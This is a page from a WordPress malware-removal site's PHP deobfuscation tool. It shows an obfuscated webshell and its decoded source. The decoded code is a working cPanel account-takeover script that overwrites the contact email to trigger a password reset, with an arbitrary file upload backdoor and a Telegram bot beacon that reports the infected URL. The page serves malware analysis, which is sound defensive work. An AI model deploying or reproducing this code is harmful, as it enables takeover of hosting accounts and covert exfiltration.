Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php // Encoded by R10TX // Jangan Di Decode Kalo Gak Mau Eror // join group https://t.me/webshellindostore $R10TXER = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQyXI0CBEEwlYAwAd"; $BYTECODE = "\xf\xn\xU\xu\x5\xL\xk\xW\xg\xe\xZ\xw\xc\xd\xC\xD\xf\xj\xU\x...



Obfuscated php code

<?php
// Encoded by R10TX
// Jangan Di Decode Kalo Gak Mau Eror
// join group https://t.me/webshellindostore

$R10TXER = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQyXI0CBEEwlYAwAd";
$BYTECODE = "\xf\xn\xU\xu\x5\xL\xk\xW\xg\xe\xZ\xw\xc\xd\xC\xD\xf\xj\xU\xC";
$R10T = "Vr3\x48\x68W5\x63\x6E8v\x63s\x682y4WW\x68\x4781651\x50\x4BT\x6BYrTsr\x65\x499\x6FyTRW\x45\x41U\x65\x6Csy\x45Qx\x4CSt\x68\x61\x2b\x4EwxV5\x61s\x4873\x47\x634yS\x45/\x42\x65\x4Bw\x655\x676\x63\x65\x6Dr\x64R\x6B\x4C6v\x4E3\x2bu\x6FR\x48\x63\x41y\x653\x47x\x6B9\x6C\x423\x44\x70r\x4E2V\x4577V\x6CU\x474yw\x6C\x6E5\x4C\x70Y\x62\x469\x65tuvz\x70\x6817\x48\x683\x4F53\x4BW\x50/\x63r\x6F\x6D4\x47\x46u\x4B8\x6AU\x50\x67y\x44u6\x6A\x6C\x638r\x6Ax\x6F\x6A\x61\x65UZ\x6Ey6607\x66Zv\x6F\x4AQXw\x64V\x4D\x494wX\x6E\x626\x6C\x62\x43\x70\x6FT\x5091r3s\x6A\x50Z1qu\x413\x44W\x69wqUW\x41t\x4E\x50\x70r0\x41\x6F0T\x48\x7062\x6At9\x665\x46/\x65\x70\x67\x658\x6C\x4CVv\x4AQ\x46\x6699x1/v\x66\x50\x61U\x4BX7\x4A\x48\x666x\x6E\x70\x2b3\x49w5Wxw76\x6B\x69\x44\x486\x432W\x4A\x45\x6D\x49\x46\x4F\x62\x46\x50u\x2b\x47r\x67\x46U\x44\x449\x4C03z\x48X\x66X\x6335r5\x6Fv\x449/w\x47\x4D\x6C1\x6A\x6B1\x66\x62\x6C4\x4316\x4Cz\x6974\x67R\x62x\x6Dw\x66\x42\x4F\x45\x46\x4F6\x61\x46\x43\x2b\x45\x4BxV\x61U7\x698s\x6B\x48\x4E\x6D\x47\x4A5\x42V\x43\x6Dqu\x46X94\x4D\x68u\x43\x4C1\x439\x70s08\x65Uu\x4E\x68Z/\x49\x49Q\x4C\x4A\x45\x626/1vs\x48\x6Ey\x69\x2b\x6Bz\x2bR3\x68\x49\x48T\x6EsU95\x6EXRQV\x6E05\x68\x668\x2b\x622\x64y48XZz\x64\x6B\x43z\x2bT\x6A\x46v\x63\x6Du\x47\x63\x48\x50v\x4FZ1Q\x65qvY\x61\x49W\x50\x46\x42\x69X\x70\x2br\x4D\x6B\x61Y\x6Ds\x67\x50\x4CS\x4BVuq\x6Ey\x6A\x65\x64\x67/T8\x41\x4D\x49X\x46\x44Q\x6D\x454T5\x6A\x49XY2yW\x41UUW4q9\x47Z\x4EQ\x47\x65\x436\x6AV\x2bS7\x41z\x45\x46\x61r\x50z\x4AtqY\x2bT\x66\x70\x6E\x4DV3\x67\x44\x6D8uu\x41\x6C\x46Z\x43\x49\x50\x67wR\x6E\x44Q\x64\x67\x62t\x46Y\x44\x63\x4C56\x43xT\x6E\x6C\x63\x50\x4F\x6Dqwt\x66S\x43\x458\x4C\x443Ty\x6B\x4E/\x69\x70uqv\x4Fu\x62\x42\x42\x64q6\x4F\x4B\x6A5\x4ATq\x62\x4Dqqy\x4BTQ94\x63\x61u\x42\x4FZ8qUt\x61U1U\x6A8\x4A2\x6D\x68\x65U\x6F\x4C\x41/\x65v\x45\x2b\x4C\x6CQ4\x4A\x65Q\x6C0S\x67\x44\x4E\x61\x46qs\x4C\x44TUUWRqT\x6B\x50\x45\x46ys\x6E\x6F\x6F0w5Q\x6F40\x4B\x42\x69u\x616\x61\x65R\x6FY\x41Z\x6F\x4D\x41VX\x61\x47Xy\x68T\x67\x64\x67Yt\x70q\x65\x6Fw\x6Dq\x65\x459\x45V\x2bW\x69r\x47R\x4E\x6C\x6BV\x62ZV0zs\x66\x66\x70\x4C9tUZ1\x63y\x70\x434\x4C\x4F\x70\x65\x45t\x65\x49\x4FV5\x46\x4E\x4C122\x4E3sv\x6A\x64\x6Bt\x6683Tt\x6C8\x612XS\x64v31z\x43\x2bs6\x70\x6C\x4694Xt\x62\x64\x64\x6B0\x2b\x6898\x2b\x6815xW\x41\x46\x4D\x63q\x48\x4Bx\x6D\x6F\x4B\x68\x4D\x6D\x48\x4D\x4D\x474x\x46\x70\x67Q\x4C\x4C\x4D\x4877\x69Q\x6CStt\x4DX\x4F\x4D\x6Cuq\x47\x6E5\x45WZ8\x6D\x2b\x4BZ\x6A\x42\x4D\x61Tsx8/570Q\x63Uuy\x45T\x4Dt\x4D\x42\x422\x64\x6B\x48\x45/\x48\x652\x48W2\x68\x45\x4C\x64v\x62t\x69\x46\x4A\x6C\x4D\x66\x2b\x6E\x6EQ3\x2b\x67\x70x7\x4B3\x61v0\x4F\x61\x41RT\x44q\x6A\x42\x45\x6A\x2b\x491\x67vuVv\x66Q\x62S6X\x4E5\x4B\x6A\x4C\x65\x6A\x4C\x62\x43\x69\x6F5\x6C\x45\x62\x70UWT\x43\x41y\x6E\x64\x64r\x42\x64S\x47\x65rr\x6FWT\x45rUQ\x480X\x6C1Ss\x63\x44\x43\x4E\x45x\x4C\x48\x4B\x6Du5\x703q\x6Axz\x4BV\x2b\x44\x41\x6B0\x42\x4Ez\x61\x45\x43Z\x6Es2ySZ\x649\x63Tzy\x611\x4DsXY\x64\x66u\x4FT\x4C4\x65\x61Wq\x6F\x47\x4B\x6A\x61\x621\x4Er\x43Vvqt\x42\x45\x62Y5\x49\x41x\x45Rw\x6EZt\x4D\x6A\x62T\x63zv\x6EY\x4A\x44\x4A9Q\x43T\x62\x67\x4F\x67q\x65\x67\x69\x61\x505w\x49\x646s\x43uy1\x662\x612\x6A\x49\x65\x4A9s\x49\x64\x4B\x63wV\x4FT\x61\x63X\x6Cq\x47079\x68Yq\x47\x44\x48Sw\x63rsW\x69\x690r\x6B\x44\x43\x6E\x68\x6A\x49Y\x44\x41T\x632q\x70R\x2b\x6Dr1\x61\x2b\x6D5U/s\x63\x70Y54\x63\x65tZx\x61qxuZ\x4D\x6D\x684W1\x63Tt\x650\x61\x65561\x66\x6A\x42T\x4D\x6E\x4Bs\x69v2\x6A\x4C7\x649Y\x687t\x4A\x6C\x68\x653\x446\x66\x41T\x6F1U71v94qz\x49\x639\x4D35\x4F\x6A\x4C\x4D\x447\x6C\x49\x45\x4A\x6CUx\x4Av\x42w2V\x4Ax\x6Aq\x644z\x2b\x43vZ\x41\x6E\x70vx7\x44\x68\x6AT\x6D\x6A\x6E\x68\x6Ew\x47y0\x62\x412\x49vyq\x49\x4EZ58\x4F\x41\x46\x45TRT\x47QU\x4D\x70\x41\x62\x68s4\x4B\x6BQ\x4E\x6C\x4C\x6EV\x6E\x6Fs\x4A\x4D\x622\x6C7SX\x4Ev42XT\x63\x4A\x6F\x49\x4B\x47t\x6B\x62\x62Z\x44\x70\x70\x70Y9W1\x4C\x42zq2\x4Br\x4865\x70\x47\x48\x47z\x62\x44\x6FX\x4F\x48\x41\x64q\x6Cw\x4A\x4A\x4DT91\x6A6\x68\x50\x61\x4DY\x43\x50QXV\x4C\x70\x4C\x62y\x4DU\x4EYs\x46\x45\x6FX\x433r\x6Fs725Y\x6D\x4F\x6E\x6Ez\x6Azztsz0R\x6F\x6C\x4E\x505\x47Xr\x41\x46\x6D\x65\x6Dv/\x62\x63\x4CzV6\x4F\x44\x42r\x4B0t\x65\x61\x4DsW1\x46T\x42\x42Z\x4Cr8q\x48\x44\x61\x46\x70\x48\x672S\x63\x68s2\x4B\x6D/\x4AuT\x2bT\x42Sq/U\x62W16\x2b\x46R\x67u\x42w\x4A\x657r\x44\x42\x46\x48w\x2b1Q\x67y\x42w\x4A\x657r\x43\x42V\x48w\x2b\x6CQ\x672\x42w\x4A\x657r\x42\x42\x6C\x48w\x2bVQ\x676\x42w\x4A\x65";
eval(htmlspecialchars_decode(gzinflate(base64_decode($R10TXER))));
?>

Decoded(de-Obfuscated) php code

<?php

// Encoded by R10TX
// Jangan Di Decode Kalo Gak Mau Eror
// join group https://t.me/webshellindostore
$R10TXER = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQyXI0CBEEwlYAwA\3d";
$BYTECODE = "\17\\xn\\xU\\xu\5\\xL\\xk\\xW\\xg\16\\xZ\\xw\f\r\f\r\17\\xj\\xU\f";
$R10T = "Vr3HhW5cn8vcsh2y4WWhG81651PKTkYrTsreI9oyTRWEAUelsyEQxLStha+NwxV5asH73Gc4ySE/BeKwe5g6cemrdRkL6vN3+uoRHcAye3Gxk9lB3DprN2VE77VlUG4ywln5LpYbF9etuvzph17Hh3O53KWP/crom4GFuK8jUPgyDu6jlc8rjxojaeUZny6607fZvoJQXwdVMI4wXnb6lbCpoTP91r3sjPZ1quA3DWiwqUWAtNPpr0Ao0THp62jt9f5F/epge8lLVvJQFf99x1/vfPaUKX7JHf6xnp+3Iw5Wxw76kiDH6C2WJEmIFObFPu+GrgFUDD9L03zHXfXc35r5ovD9/wGMl1jk1fbl4C16Lzi74gRbxmwfBOEFO6aFC+EKxVaU7i8skHNmGJ5BVCmquFX94MhuCL1C9ps08eUuNhZ/IIQLJEb6/1vsHnyi+kz+R3hIHTnsU95nXRQVn05hf8+b2dy48XZzdkCz+TjFvcmuGcHPvOZ1QeqvYaIWPFBiXp+rMkaYmsgPLSKVuqnyjedg/T8AMIXFDQmE4T5jIXY2yWAUUW4q9GZNQGeC6jV+S7AzEFarPzJtqY+TfpnMV3gDm8uuAlFZCIPgwRnDQdgbtFYDcL56CxTnlcPOmqwtfSCE8LD3TykN/ipuqvOubBBdq6OKj5JTqbMqqyKTQ94cauBOZ8qUtaU1Uj8J2mheUoLA/evE+LlQ4JeQl0SgDNaFqsLDTUUWRqTkPEFysnoo0w5Qo40KBiua6aeRoYAZoMAVXaGXyhTgdgYtpqeowmqeE9EV+WirGRNlkVbZV0zsffpL9tUZ1cypC4LOpeEteIOV5FNL122N3svjdktf83Ttl8a2XSdv31zC+s6plF94Xtbddk0+h98+h15xWAFMcqHKxmoKhMmHMMG4xFpgQLLMH77iQlSttMXOMluqGn5EWZ8m+KZjBMaTsx8/570QcUuyETMtMBB2dkHE/He2HW2hELdvbtiFJlMf+nnQ3+gpx7K3av0OaARTDqjBEj+I1gvuVvfQbS6XN5KjLejLbCio5lEbpUWTCAynddrBdSGerroWTErUQH0Xl1SscDCNExLHKmu5p3qjxzKV+DAk0BNzaECZns2ySZd9cTzya1MsXYdfuOTL4eaWqoGKjab1NrCVvqtBEbY5IAxERwnZtMjbTczvnYJDJ9QCTbgOgqegiaP5wId6sCuy1f2a2jIeJ9sIdKcwVOTacXlqG079hYqGDHSwcrsWii0rkDCnhjIYDATc2qpR+mr1a+m5U/scpY54cetZxaqxuZMmh4W1cTte0ae561fjBTMnKsiv2jL7d9Yh7tJlhe3D6fATo1U71v94qzIc9M35OjLMD7lIEJlUxJvBw2VJxjqd4z+CvZAnpvx7DhjTmjnhnwGy0bA2IvyqINZ58OAFETRTGQUMpAbhs4KkQNlLnVnosJMb2l7SXNv42XTcJoIKGtkbbZDpppY9W1LBzq2KrH65pGHGzbDoXOHAdqlwJJMT91j6hPaMYCPQXVLpLbyMUNYsFEoXC3ros725YmOnnzjzztsz0RolNP5GXrAFmemv/bcLzV6ODBrK0teaMsW1FTBBZLr8qHDaFpHg2Schs2Km/JuT+TBSq/UbW16+FRguBwJe7rDBFHw+1QgyBwJe7rCBVHw+lQg2BwJe7rBBlHw+VQg6BwJe";
eval {
    echo '<html>
    <head>
          <title>Script Resetpass CPanel v1.0</title>
          <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
          <style>
              body {
        background-image: url("https://i.ibb.co/1LkCFDd/xB.jpg");
}
              h2{
              color:#80D713;
              }
          </style>
        </head>
  <br><body>
     <!--SCC -->
       <center>
       <div style="border-radius: 20px;border: 2px solid #2980B9;padding: 8px 4px;width: 25%;line-height: 24px;background: #000;color:#fff;">
    <p><h2>Script Resetpass CP</h2></p>
     <p><h2>Coded By xBlackxCoder</h2></p>
    <p>
        <form action="#" method="post">
    <input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" />
    <input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/>
    </form>

    <br /><br /><br />
    </p>
    </div>
   </center>
    </body>
</html>';
    $user = get_current_user();
    $site = $_SERVER['HTTP_HOST'];
    $ips = getenv('REMOTE_ADDR');
    if (isset($_POST['submit'])) {
        $email = $_POST['email'];
        $wr = 'email:' . $email;
        $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w');
        fwrite($f, $wr);
        fclose($f);
        $f = fopen('/home/' . $user . '/.contactinfo', 'w');
        fwrite($f, $wr);
        fclose($f);
        $parm = $site . ':2082/resetpass?start=1';
        echo '<br/><center>' . $parm . '</center>';
        echo '<br/><center>' . $user . '</center>';
    }
    if (isset($_GET['inc']) && $_GET['inc'] === 'upload') {
        echo '<form method="post" enctype="multipart/form-data">';
        echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">';
        echo '<input type="file" name="file" size="15">';
        echo '<input type="submit" value="Unggah">';
        echo '</form>';
    }
    if (isset($_FILES['file']['tmp_name'])) {
        $upload = $_FILES['file']['tmp_name'];
        if (file_exists($upload)) {
            $pwddir = $_POST['dir'];
            $real = $_FILES['file']['name'];
            $de = $pwddir . "/" . $real;
            copy($upload, $de);
            echo "BERKAS DIUNGGAHKAN KE {$de}";
        }
    }
    $telegramBotToken = '6894745203:AAFjGXNB-y2OqKcqJgOARnHOaaHK-E0tS6g';
    $chatId = '5498177352';
    $currentUrl = 'http';
    if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
        $currentUrl = "https";
    }
    $currentUrl .= '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $message = "URL PHP skrip ini: {$currentUrl}";
    $url = "https://api.telegram.org/bot{$telegramBotToken}/sendMessage?chat_id={$chatId}&text={$message}";
    file_get_contents($url);
};


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.